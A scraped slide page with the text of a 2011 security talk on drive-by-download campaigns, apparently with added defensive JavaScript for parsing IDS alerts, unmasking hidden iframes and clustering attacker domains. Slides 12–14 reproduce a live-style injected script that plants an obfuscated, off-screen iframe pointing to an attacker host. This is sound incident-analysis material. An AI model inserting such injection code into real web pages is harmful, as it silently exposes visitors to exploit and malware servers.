So einfach geht modernes Roaming fuer Notes und Nomad.pdfSo einfach geht modernes Roaming fuer Notes und Nomad.pdf
So einfach geht modernes Roaming fuer Notes und Nomad.pdf
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...Genislab builds better products and faster go-to-market with Lean project man...
Genislab builds better products and faster go-to-market with Lean project man...
 
UiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to HeroUiPath Community: Communication Mining from Zero to Hero
UiPath Community: Communication Mining from Zero to Hero
 
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...Zeshan Sattar- Assessing the skill requirements and industry expectations for...
Zeshan Sattar- Assessing the skill requirements and industry expectations for...
 
Generative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdfGenerative Artificial Intelligence: How generative AI works.pdf
Generative Artificial Intelligence: How generative AI works.pdf
 
Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)Design pattern talk by Kaya Weers - 2024 (v2)
Design pattern talk by Kaya Weers - 2024 (v2)
 
React Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App FrameworkReact Native vs Ionic - The Best Mobile App Framework
React Native vs Ionic - The Best Mobile App Framework
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024Top 10 Hubspot Development Companies in 2024
Top 10 Hubspot Development Companies in 2024
 
TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024TeamStation AI System Report LATAM IT Salaries 2024
TeamStation AI System Report LATAM IT Salaries 2024
 
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
Unleashing Real-time Insights with ClickHouse_ Navigating the Landscape in 20...
 
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security ObservabilityGlenn Lazarus- Why Your Observability Strategy Needs Security Observability
Glenn Lazarus- Why Your Observability Strategy Needs Security Observability
 
Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024Long journey of Ruby standard library at RubyConf AU 2024
Long journey of Ruby standard library at RubyConf AU 2024
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
2024 April Patch Tuesday
2024 April Patch Tuesday2024 April Patch Tuesday
2024 April Patch Tuesday
 
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptxMerck Moving Beyond Passwords: FIDO Paris Seminar.pptx
Merck Moving Beyond Passwords: FIDO Paris Seminar.pptx
 

Vladimir Kropotov - Drive-By-Download attack evolution before and after vulnerabilities’ publication by the information security analyst eyes

  • 1. Drive-By-Download Attack Evolution Before and After Vulnerability Disclosure
    Vladimir B. Kropotov, TBINFORM (TNK-BP Group)
  • 2. Drive-By-Download
    • Hackers distribute malware by "poisoning" legitimate websites
    • Hacker injects malicious iframes into HTML content
    • Vulnerabilities in browsers, Acrobat, Java, Flash Player, etc. are used by the attacker
    You just want information about insurance, nothing more, but…
  • 3. What does it look like? (diagram)
    • PC connected to the Internet
    • Known server with iframe
    • Intermediate server controlled by attacker (exchange labelled "OS, browser plugins, etc. INFO" / "Host ready")
    • Exploit server controlled by attacker ("Exploit")
    • Malware server controlled by attacker ("Malware")
  • 4. How we find it?
    Date/Time            2011-08-05 10:44:53 YEKST
    Tag Name             PDF_XFA_Script
    Observance Type      Intrusion Detection
    Cleared Flag         false
    Target IP Address    10.X.X.X
    Target Object Name   9090
    Target Object Type   Target Port
    Target Service       unknown
    Source IP Address    10.X.X.Y
    SourcePort Name      2359
    :compressed          zlib
    :server              total.logeater.org
    :URL                 //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
  • 5. How we find it? DOES USER NEED IT??
    (the same alert as on slide 4, shortened)
    Date/Time            2011-08-05 10:44:53
    Tag Name             PDF_XFA_Script
    Target IP Address    10.X.X.X
    Target Object Name   9090
    Target Object Type   Target Port
    Source IP Address    10.X.X.Y
    SourcePort Name      2359
    :compressed          zlib
    :server              total.logeater.org
    :URL                 //images/np/45eebb038bd46a63e08665f3081fb408/6cd14aca59271182c8a04159f9ad2804.pdf
  • 6. First indicators
    Date/Time    2011-07-26 11:24:37
    Tag Name     PDF_XFA_Script
    arg          3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750
    compressed   zlib
    server       mamjhvbw.dyndns.pro
    URL          /ghqlv3ym/
  • 7. First indicators
    Date/Time    2011-08-16 13:24:44
    Tag Name     ActiveX_Warning
    :clsid       CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
    server       skipetar.in
    URL          /jb/pda.js

    Date/Time    2011-08-18 19:00:13
    Tag Name     ActiveX_Warning
    clsid        CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
    server       e1in.in
    URL          /stat/574a353789f/pda.js
  • 8. First indicators
    Date/Time    2011-08-09 10:17:14
    Tag Name     PDF_XFA_Script
    arg          host=http://inaptly.in&b=486def4
    compressed   gzip
    server       inaptly.in
    URL          /jb/lastrger.php

    Date/Time    2011-08-14 14:06:28
    Tag Name     PDF_XFA_Script
    :arg         host=http://oligist.in&b=486def4
    :compressed  gzip
    :server      oligist.in
    :URL         /jb/lastrger.php

    Date/Time    2011-08-18 19:00:13
    Tag Name     PDF_XFA_Script
    arg          host=http://e1in.in/stat&u=root
    compressed   zlib
    server       e1in.in
    URL          /stat/574a353789f/lastrger.php
  • 9. First indicators (the six alerts of slides 6–8 side by side)
    2011-07-26 11:24:37  PDF_XFA_Script   mamjhvbw.dyndns.pro  /ghqlv3ym/                        arg 3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750, compressed zlib
    2011-08-09 10:17:14  PDF_XFA_Script   inaptly.in           /jb/lastrger.php                  arg host=http://inaptly.in&b=486def4, compressed gzip
    2011-08-14 14:06:28  PDF_XFA_Script   oligist.in           /jb/lastrger.php                  arg host=http://oligist.in&b=486def4, compressed gzip
    2011-08-16 13:24:44  ActiveX_Warning  skipetar.in          /jb/pda.js                        clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
    2011-08-18 19:00:13  ActiveX_Warning  e1in.in              /stat/574a353789f/pda.js          clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
    2011-08-18 19:00:13  PDF_XFA_Script   e1in.in              /stat/574a353789f/lastrger.php    arg host=http://e1in.in/stat&u=root, compressed zlib
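Slides 4–9 show the raw IDS alerts the analysts worked from, with the server, URL, `arg` and `clsid` fields spread over several screenshots. The following is an added example, not code from the talk: it parses alert text laid out the way the slides show it (key, whitespace, value; some keys carry a leading colon) into records, breaks the `arg` query string apart so the `host` parameter can be compared with the alert's `server`, and collects the servers, full URLs and CLSIDs as a de-duplicated indicator set for blocking or hunting. The sample alert text is constructed from the values printed on the slides; the key names are assumed to be exactly the labels shown there.

```javascript
// Added example: turn IDS alert dumps like those on slides 4-9 into records
// and extract network indicators. Not code from the original talk.

// Constructed sample input: values from the slides, layout reconstructed.
const SAMPLE_ALERTS = `
Date/Time 2011-07-26 11:24:37
Tag Name PDF_XFA_Script
arg 3592ba48df0fae9e5f5c5b09535a070d0b04020600510f0c56075c06040750
compressed zlib
server mamjhvbw.dyndns.pro
URL /ghqlv3ym/

Date/Time 2011-08-09 10:17:14
Tag Name PDF_XFA_Script
arg host=http://inaptly.in&b=486def4
compressed gzip
server inaptly.in
URL /jb/lastrger.php

Date/Time 2011-08-14 14:06:28
Tag Name PDF_XFA_Script
:arg host=http://oligist.in&b=486def4
:compressed gzip
:server oligist.in
:URL /jb/lastrger.php

Date/Time 2011-08-16 13:24:44
Tag Name ActiveX_Warning
:clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server skipetar.in
URL /jb/pda.js

Date/Time 2011-08-18 19:00:13
Tag Name ActiveX_Warning
clsid CAFEEFAC-DEC7-0000-0000-ABCDEFFEDCBA
server e1in.in
URL /stat/574a353789f/pda.js

Date/Time 2011-08-18 19:00:13
Tag Name PDF_XFA_Script
arg host=http://e1in.in/stat&u=root
compressed zlib
server e1in.in
URL /stat/574a353789f/lastrger.php
`;

// Keys as they appear on the slides (assumed to be the exact labels); a leading ':' is tolerated.
const KEY_RE = /^:?(Date\/Time|Tag Name|arg|compressed|server|URL|clsid)\s+(.+)$/;

// One record per blank-line-separated alert.
function parseAlerts(text) {
  const alerts = [];
  for (const chunk of text.trim().split(/\n\s*\n/)) {
    const rec = {};
    for (const line of chunk.split('\n')) {
      const m = KEY_RE.exec(line.trim());
      if (m) rec[m[1]] = m[2].trim();
    }
    if (rec['Date/Time']) alerts.push(rec);
  }
  return alerts;
}

// The PDF alerts' `arg` is a query string (host=...&b=...); split it into a map.
// A bare hex blob (slide 6) has no '=', so it yields an empty map.
function parseArg(arg) {
  const out = {};
  if (!arg || !arg.includes('=')) return out;
  for (const pair of arg.split('&')) {
    const i = pair.indexOf('=');
    if (i > 0) out[pair.slice(0, i)] = pair.slice(i + 1);
  }
  return out;
}

function hostOf(u) { try { return new URL(u).hostname; } catch (e) { return null; } }

// De-duplicated indicators: servers, full URLs, CLSIDs, and hosts named inside `arg`.
function indicatorsFrom(alerts) {
  const servers = new Set(), urls = new Set(), clsids = new Set(), argHosts = new Set();
  for (const a of alerts) {
    if (a.server) servers.add(a.server);
    if (a.server && a.URL) urls.add(`http://${a.server}${a.URL}`);
    if (a.clsid) clsids.add(a.clsid.toUpperCase());
    const h = hostOf(parseArg(a.arg).host);
    if (h) argHosts.add(h);
  }
  return { servers: [...servers].sort(), urls: [...urls].sort(), clsids: [...clsids], argHosts: [...argHosts].sort() };
}

// Group by server so recurring hosts and their date range stand out.
function timelineByServer(alerts) {
  const byServer = {};
  for (const a of alerts) {
    if (!byServer[a.server]) byServer[a.server] = [];
    byServer[a.server].push(`${a['Date/Time']} ${a['Tag Name']} ${a.URL}`);
  }
  return byServer;
}
```

On the slide data every `host` parameter names the same server the alert was raised for, which is why the talk can treat the `server` field alone as the indicator; `argHosts` is kept separately because that need not hold in general.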
  • 12. Example: o-strahovanie.ru, Sep 02
    / ============ bbb ============
    document.xmlSettings.if_ik=false;
    if(window.localStorage){
      if(window.localStorage.if_ik){
        if(parseInt(window.localStorage.if_ik)+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
      }else document.xmlSettings.if_ik=true;
    }else{// 4 osel
      if(document.xmlSettings.getCookie('if_ik')){
        if(parseInt(document.xmlSettings.getCookie('if_ik'))+2592000 < document.xmlSettings.time()) document.xmlSettings.if_ik=true;
      }else document.xmlSettings.if_ik=true;
    }
    if(document.xmlSettings.if_ik){
      if(window.localStorage)window.localStorage.if_ik=document.xmlSettings.time();
      else document.xmlSettings.setCookie('if_ik',document.xmlSettings.time(),{ expires:(document.xmlSettings.time() + 86400*365) });
      document.xmlSettings.iframe=document.createElement('iframe');
      document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
      document.body.appendChild(document.xmlSettings.iframe);
      document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
    }
    Cookie (screenshot): if_ik 1315314771, www.o-strahovanie.ru/, 1600429305625633310239293001403230174358*
  • 13. Example: o-strahovanie.ru
    / ============ bbb ============
    else{// 4 osel
      if(document.xmlSettings.getCookie('if_ik')){
      …
      document.xmlSettings.iframe=document.createElement('iframe');
      document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
      document.body.appendChild(document.xmlSettings.iframe);
      document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
    }
    Cookie (screenshot): if_ik 1315314771, www.o-strahovanie.ru/, 1600429305625633310239293001403230174358*
  • 14. Example: o-strahovanie.ru
    else{// 4 osel
      …
      document.body.appendChild(document.xmlSettings.iframe);
      document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
    }
    iframe.src = 'http://disregarding.in/xtqd2/08.php'
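Slides 12–14 show the injected script: it keeps an `if_ik` marker in localStorage or a cookie, creates the iframe only when the marker is missing or older than 2592000 seconds (30 days), styles it 1px by 1px, absolutely positioned 5000px off-screen, and hides the destination by splitting the URL into concatenated string pieces. The following is an added example, not code from the talk or from the o-strahovanie.ru incident: a static check a site owner or analyst can run over a suspicious script fragment that folds adjacent string-literal concatenations back into one literal (recovering `http://disregarding.in/xtqd2/08.php` from the pieces on slide 14) and reports every iframe `src` assignment together with the style properties that mark the frame as concealed. The sample input is the tail of the slide's script, reproduced from the slide; the heuristics list is my own and assumed to be a reasonable starting set, not an exhaustive one.

```javascript
// Added example: fold 'a'+'b' string chains and flag concealed iframes in an
// injected script fragment. Not code from the original talk.

// Sample input reproduced from slides 12-14 (the injected script's final lines).
const INJECTED = `
document.xmlSettings.iframe=document.createElement('iframe');
document.xmlSettings.iframe.style.cssText='height:1px;position:absolute;width:1px;border:none;left:-5000px;';
document.body.appendChild(document.xmlSettings.iframe);
document.xmlSettings.iframe.src='htt'+'p://'+'disreg'+'arding.i'+'n/xtqd2/08.p'+'hp';
`;

// Matches two adjacent string literals joined by '+', with either quote style.
// Literals containing escapes are deliberately not folded, to avoid mis-parsing.
const PAIR_RE = /'([^'\\]*)'\s*\+\s*'([^'\\]*)'|"([^"\\]*)"\s*\+\s*"([^"\\]*)"/;

// Repeatedly merge the leftmost literal pair until no 'a'+'b' remains.
// A chain that mixes in variables keeps its variable parts untouched.
function foldStringConcat(js) {
  let out = js, m;
  while ((m = PAIR_RE.exec(out)) !== null) {
    const merged = m[1] !== undefined ? `'${m[1]}${m[2]}'` : `"${m[3]}${m[4]}"`;
    out = out.slice(0, m.index) + merged + out.slice(m.index + m[0].length);
  }
  return out;
}

// Style properties that, combined, describe a frame the visitor cannot see
// (assumed heuristic set; extend for your own environment).
const HIDDEN_STYLE_HINTS = [
  [/position\s*:\s*absolute/i, 'absolute positioning'],
  [/(?:width|height)\s*:\s*[01]px/i, '1px-or-smaller size'],
  [/(?:left|top)\s*:\s*-\d{3,}px/i, 'placed far off-screen'],
  [/visibility\s*:\s*hidden|display\s*:\s*none/i, 'hidden via visibility/display'],
];

function hostOf(u) { try { return new URL(u).hostname; } catch (e) { return null; } }

// One finding per `.src = '...'` assignment in the folded script. The style
// hints are evaluated over the whole fragment, not tied to a specific element,
// which is adequate for short injected snippets like this one.
function findHiddenIframes(js) {
  const folded = foldStringConcat(js);
  const createsIframe = /createElement\(\s*['"]iframe['"]\s*\)/i.test(folded);
  const findings = [];
  const srcRe = /\.src\s*=\s*(['"])([^'"]*)\1/g;
  let m;
  while ((m = srcRe.exec(folded)) !== null) {
    const reasons = [];
    for (const [re, why] of HIDDEN_STYLE_HINTS) if (re.test(folded)) reasons.push(why);
    findings.push({
      src: m[2],
      host: hostOf(m[2]),
      createsIframe,
      hidden: createsIframe && reasons.length >= 2,
      reasons,
    });
  }
  return findings;
}
```

Run `findHiddenIframes(INJECTED)` and the single finding names `disregarding.in` as the frame target with three concealment reasons. The folded URL is what goes into the blocklist or the registrar lookup on the next slides; the same fold is useful before grepping web server content for a known intermediate host, since the raw pieces never contain the hostname as a substring.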
  • 15. Drive By Download: o-strahovanie.ru, Sep 02 (diagram)
    • Known server with iframe: o-strahovanie.ru
    • Intermediate server: disregarding.in
    • Host ready: NO
    • Exploit: NO
    • Exploit server / Malware server: nothing delivered
  • 16. Drive By Download: o-strahovanie.ru, Sep 12 (diagram)
    • Known server with iframe: o-strahovanie.ru
    • Intermediate server: disregarding.in
    • Host ready / Exploit / Malware: yes
    • Exploit server: chamberwoman.in, janiculum.in
    • Malware server: chamberwoman.in, janiculum.in
  • 17. Example: o-strahovanie.ru
    Domain Name: DISREGARDING.IN
    Created On: 14-Jul-2011 11:09:59 UTC
    Registrant Name: Russell Rosario
    Registrant Street1: 136 Oakdale Avenue
    City: Winter Haven
    Registrant Country: US
    Email: russellsrosario@teleworm.com
    Name Server: NS1.PRIDES.ME
    Name Server: NS2.PRIDES.ME

    Domain Name: JANICULUM.IN, CHAMBERWOMAN.IN
    Created On: 12-Sep-2011 08:14 UTC
    Registrant Name: Russell Rosario
  • 18. Example: o-strahovanie.ru
    Domain Name: DISREGARDING.IN
    Created On: 14-Jul-2011 11:09:59 UTC
    Domain Name: JANICULUM.IN, CHAMBERWOMAN.IN
    Created On: 12-Sep-2011 08:14 UTC
    Registrant Name: Russell Rosario
    No payload, because no payload requests? Are they looking for customers?
  • 19. Example: o-strahovanie.ru
    Domain ID: D5165642-AFIN
    Domain Name: DISREGARDING.IN
    Created On: 14-Jul-2011 11:09:59 UTC
    Registrant Name: Russell Rosario
    Registrant Street1: 136 Oakdale Avenue
    City: Winter Haven
    Registrant Country: US
    Email: russellsrosario@teleworm.com
    Name Server: NS1.PRIDES.ME
    Name Server: NS2.PRIDES.ME
  • 20. Russell Rosario
    Domain Name: FILTRATED.IN
    Created On: 14-Jul-2011 11:09:53 UTC
    Sponsoring Registrar: Directi Web Services Pvt. Ltd. (R118-AFIN)
    Registrant ID: TS_16731618
    Registrant Name: Russell Rosario
    Registrant Street1: 136 Oakdale Avenue
    Registrant City: Winter Haven
    Registrant State/Province: Florida
    Registrant Postal Code: 33830
    Registrant Country: US
    Registrant Phone: +1.8635571308
    Email: russellsrosario@teleworm.com
    Other domains of the same registrant, created 14-Jul-2011 between 11:09:53 and 11:10:03 UTC: filtrated.in, raptnesses.in, tansies.in
    But Sally Doesn't Know…
  • 21. Attack before public disclosure
    • Primary location for malicious sites: .IN
    • Physical servers location by IP address: Romania
    • Responsible person: Russell Rosario
    • Domains are new
  • 22. Domain owner is the same
    Domain Name      Created On                 Registrant Name
    irrefutably.in   15-Jul-2011 11:00:21 UTC   Russell Rosario
    comprador.in     25-Jul-2011 05:59:54 UTC   Russell Rosario
    hyalines.in      29-Jul-2011 09:39:33 UTC   Russell Rosario
    suffrago.in      01-Aug-2011 05:35:12 UTC   Russell Rosario
    ruritanian.in    01-Aug-2011 05:35:50 UTC   Russell Rosario
    20-Jul-2011: Acrobat vulnerability, vendor notified
  • 23. Vulnerability reported to vendor
    VUPEN Security Research - Adobe Acrobat and Reader PCX Processing Heap Overflow Vulnerability
    VUPEN Security Research - Adobe Acrobat and Reader IFF Processing Heap Overflow Vulnerability
    VUPEN Security Research - Adobe Acrobat and Reader Picture Dimensions Heap Overflow Vulnerability
    VUPEN Security Research - Adobe Acrobat and Reader TIFF BitsPerSample Heap Overflow Vulnerability
      X. DISCLOSURE TIMELINE
      2011-07-20 - Vulnerability Discovered by VUPEN and shared with TPP customers
      2011-09-14 - Public disclosure
    ZDI-11-310 : Adobe Reader Compound Glyph Index Sign Extension Remote Code Execution Vulnerability
      Disclosure Timeline:
      2011-07-20 - Vulnerability reported to vendor
      2011-10-26 - Coordinated public release of advisory
    ZDI-11-316 : Apple QuickTime H264 Matrix Conversion Remote Code Execution Vulnerability
      Disclosure Timeline:
      2011-07-20 - Vulnerability reported to vendor
      2011-10-27 - Coordinated public release of advisory
  • 24. Harvesting machine started
    Domain Name        Created On                 Registrant Name
    microdrili.in      05-Aug-2011 07:13:08 UTC   Russell Rosario
    oligist.in         05-Aug-2011 07:13:12 UTC   Russell Rosario
    provost.in         05-Aug-2011 07:13:18 UTC   Russell Rosario
    vaginalitis.in     05-Aug-2011 07:13:25 UTC   Russell Rosario
    kremlinology.in    05-Aug-2011 07:13:35 UTC   Russell Rosario
    invariance.in      05-Aug-2011 07:13:41 UTC   Russell Rosario
    alleghenian.in     05-Aug-2011 07:13:48 UTC   Russell Rosario
    dandifies.in       05-Aug-2011 07:14:06 UTC   Russell Rosario
    xenophoby.in       05-Aug-2011 07:14:09 UTC   Russell Rosario
    alliaria.in        05-Aug-2011 07:14:15 UTC   Russell Rosario
    skipetar.in        05-Aug-2011 07:14:21 UTC   Russell Rosario
    inaptly.in         05-Aug-2011 07:15:05 UTC   Russell Rosario
    allhallowtide.in   05-Aug-2011 07:15:20 UTC   Russell Rosario
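The argument of slides 21–24 rests on three observations about the registrar data: one registrant name, domains only days old when they first appear in alerts, and registrations arriving in bursts (thirteen domains inside two and a half minutes on 05-Aug-2011) that sit between the 20-Jul-2011 vendor notification and the 14-Sep-2011 public disclosure. The following is an added example, not code from the talk: it parses the slides' `Created On` timestamps, groups records of the same registrant into bursts when consecutive registrations are no more than a configurable gap apart, places each burst on the disclosure timeline of slide 23, and reports which domains were younger than a given age at the time of an alert. The records are the rows from slides 22 and 24; the burst gap and the age threshold are my own assumed parameters.

```javascript
// Added example: burst clustering and domain-age checks over registrar
// records like those on slides 22 and 24. Not code from the original talk.

const MONTHS = { Jan: 0, Feb: 1, Mar: 2, Apr: 3, May: 4, Jun: 5, Jul: 6, Aug: 7, Sep: 8, Oct: 9, Nov: 10, Dec: 11 };

// "05-Aug-2011 07:13:08 UTC" -> Date in UTC.
function parseWhoisDate(s) {
  const m = /^(\d{2})-([A-Z][a-z]{2})-(\d{4}) (\d{2}):(\d{2}):(\d{2}) UTC$/.exec(s.trim());
  if (!m || MONTHS[m[2]] === undefined) throw new Error('unrecognised date: ' + s);
  return new Date(Date.UTC(+m[3], MONTHS[m[2]], +m[1], +m[4], +m[5], +m[6]));
}

// Rows from slides 22 and 24 (values from the slides, table constructed here).
const RECORDS = [
  ['irrefutably.in',   '15-Jul-2011 11:00:21 UTC', 'Russell Rosario'],
  ['comprador.in',     '25-Jul-2011 05:59:54 UTC', 'Russell Rosario'],
  ['hyalines.in',      '29-Jul-2011 09:39:33 UTC', 'Russell Rosario'],
  ['suffrago.in',      '01-Aug-2011 05:35:12 UTC', 'Russell Rosario'],
  ['ruritanian.in',    '01-Aug-2011 05:35:50 UTC', 'Russell Rosario'],
  ['microdrili.in',    '05-Aug-2011 07:13:08 UTC', 'Russell Rosario'],
  ['oligist.in',       '05-Aug-2011 07:13:12 UTC', 'Russell Rosario'],
  ['provost.in',       '05-Aug-2011 07:13:18 UTC', 'Russell Rosario'],
  ['vaginalitis.in',   '05-Aug-2011 07:13:25 UTC', 'Russell Rosario'],
  ['kremlinology.in',  '05-Aug-2011 07:13:35 UTC', 'Russell Rosario'],
  ['invariance.in',    '05-Aug-2011 07:13:41 UTC', 'Russell Rosario'],
  ['alleghenian.in',   '05-Aug-2011 07:13:48 UTC', 'Russell Rosario'],
  ['dandifies.in',     '05-Aug-2011 07:14:06 UTC', 'Russell Rosario'],
  ['xenophoby.in',     '05-Aug-2011 07:14:09 UTC', 'Russell Rosario'],
  ['alliaria.in',      '05-Aug-2011 07:14:15 UTC', 'Russell Rosario'],
  ['skipetar.in',      '05-Aug-2011 07:14:21 UTC', 'Russell Rosario'],
  ['inaptly.in',       '05-Aug-2011 07:15:05 UTC', 'Russell Rosario'],
  ['allhallowtide.in', '05-Aug-2011 07:15:20 UTC', 'Russell Rosario'],
].map(([domain, created, registrant]) => ({ domain, created: parseWhoisDate(created), registrant }));

// Milestones from slide 23 (vendor notification and the Acrobat public disclosure).
const TIMELINE = {
  vendorNotified: Date.UTC(2011, 6, 20),
  publicDisclosure: Date.UTC(2011, 8, 14),
};

function phaseOf(date, tl = TIMELINE) {
  const t = date.getTime();
  if (t < tl.vendorNotified) return 'before vendor notification';
  if (t < tl.publicDisclosure) return 'between notification and public disclosure';
  return 'after public disclosure';
}

// A burst: same registrant, each registration within gapSeconds of the previous one.
// gapSeconds = 120 is an assumed threshold, chosen to separate the 05-Aug batch
// from the single registrations of late July.
function clusterBursts(records, gapSeconds = 120) {
  const sorted = [...records].sort((a, b) => a.created - b.created);
  const bursts = [];
  let cur = null;
  for (const r of sorted) {
    if (cur && cur.registrant === r.registrant && (r.created - cur.last) / 1000 <= gapSeconds) {
      cur.domains.push(r.domain);
      cur.last = r.created;
    } else {
      cur = { registrant: r.registrant, first: r.created, last: r.created, domains: [r.domain], phase: phaseOf(r.created) };
      bursts.push(cur);
    }
  }
  return bursts;
}

// Domains younger than maxDays at observation time `atMs` (e.g. an alert timestamp).
function youngDomains(records, atMs, maxDays = 7) {
  const limit = maxDays * 86400 * 1000;
  return records.filter(r => atMs - r.created.getTime() >= 0 && atMs - r.created.getTime() < limit).map(r => r.domain);
}
```

`clusterBursts(RECORDS)` yields five bursts: the lone 15-Jul registration falls before the vendor notification, and the remaining four, including the thirteen-domain batch of 05-Aug, fall between notification and public disclosure. `youngDomains(RECORDS, Date.UTC(2011, 7, 9, 10, 17, 14))`, using the timestamp of the slide 8 alert for inaptly.in, returns exactly the 05-Aug batch, which is the "domains are new" observation of slide 21 expressed as a check that can run on every alert.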
  • 25. But maybe someone knows?
    • Spamlists
    • AV vendors
    • Safebrowsing
    • Securityfocus
  • 29. Securityfocus, Sep 07
    Sent: Wednesday, September 07, 2011 11:31 PM
    Subject: There is a strange get request header in all web pages of my site? I'm worried about Trojan attack!
    Today I found that Kasper Anti Virus has blocked my site and says to the clients that this site is affected by a Trojan. I traced my site with Fiddler debugging tool and I found that every time I send a request to the site a GET request handler is established to the following URL: "http://carlos.c0m.li/iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7"
  • 30. PDF vulnerabilities public disclosure Sep 14. What to expect?
  • 31. PDF vulnerabilities public disclosure Sep 14. What to expect?
    NO GOOD NEWS, JUST EPIC FAIL for site administrators
  • 32. No good news. Hundreds of domains were registered
    ITALIA-NEW.IN      KLERK-EVEN.RU
    BANER-KLERK.RU     KLERK-EVENTS.RU
    BANK-KLERK.RU      KLERK-LAW.RU
    BANNER-KLERK.RU    KLERK-NEW.RU
    BLOGS-KLERK.RU     KLERK-NEWS.RU
    BUH-KLERK.RU       KLERK-REKLAMA.RU
    DAILY-KP.RU        KLERK-RU.RU
    FORUM-KLERK.RU     KLERK-WORK.RU
    I-OBOZREVATEL.RU   KLERK2.RU
    INTERFAX-REGION.RU OBOZREVATEL-RU.RU
    JOB-KLERK.RU       OBOZREVATELRU.RU
    KLERK-BANK.RU      WIKI-KLERK.RU
    KLERK-BANKIR.RU    PRESS-RZD.RU
    KLERK-BIZ.RU       RZD-RZD.RU
    KLERK-BOSS.RU      IPGEOBASE.IN
    KLERK-BUH.RU       ***
  • 33. "New generation" (diagram)
    • PC connected to the Internet
    • Known server with iframe
    • Other known server NOT controlled by attacker
    • Intermediate server controlled by attacker (exchange labelled "OS, browser plugins, etc. INFO" / "Host ready")
    • Exploit server controlled by attacker ("Exploit")
    • Malware server controlled by attacker ("Malware")
  • 34. Attack after public disclosure
    • Primary location for malicious sites: .IN, .RU, .CX.CC, .BIZ, .INFO, …
    • Physical servers location by IP address: international
    • Domains registered to different spurious persons
    • Domain lifetime ~ time to blacklist appearance
    • Attack refers to the malicious server for a short period of time, and to a well-known one almost all day long (blacklist evasion technique)
    • If you don't know the exact malware URL, the site redirects to a well-known server
    • Different types of payload used: password stealers, win lockers, and even "normal" (or another ZD) files installed
  • 35. Known sites examples: RZD.RU (Russian railroads)
  • 37. Known sites examples: RZD.RU (Russian railroads)
  • 39. Known sites examples: KP.RU (Komsomolskaya Pravda, newspaper)
  • 41. Other examples: EG.RU (newspaper, 263 685 visits per day)
  • 42. Other examples: svpressa.ru (newspaper, 276 720 visits per day)
  • 45. Another news, another phone…
    • Legal
    • Faked
  • 56. What can we do?
    • Patch endpoints
    • Tighten Internet filtering (default deny if possible)
    • No Internet surfing with admin rights
    • See what's happening (continuous monitoring)
    • Check if you're well (regular technical audits)
    • Educate people
  • 57. Credits
    • Sergey V. Soldatov, TBINFORM (TNK-BP Group)
    • Konstantin Y. Kadushkin, TBINFORM (TNK-BP Group)
    • Wayne Huang, ARMORIZE
  • 58. THE END
    Vladimir B. Kropotov, Information security analyst, TBINFORM (TNK-BP Group)
    vbkropotov@tnk-bp.com
    kropotov@ieee.org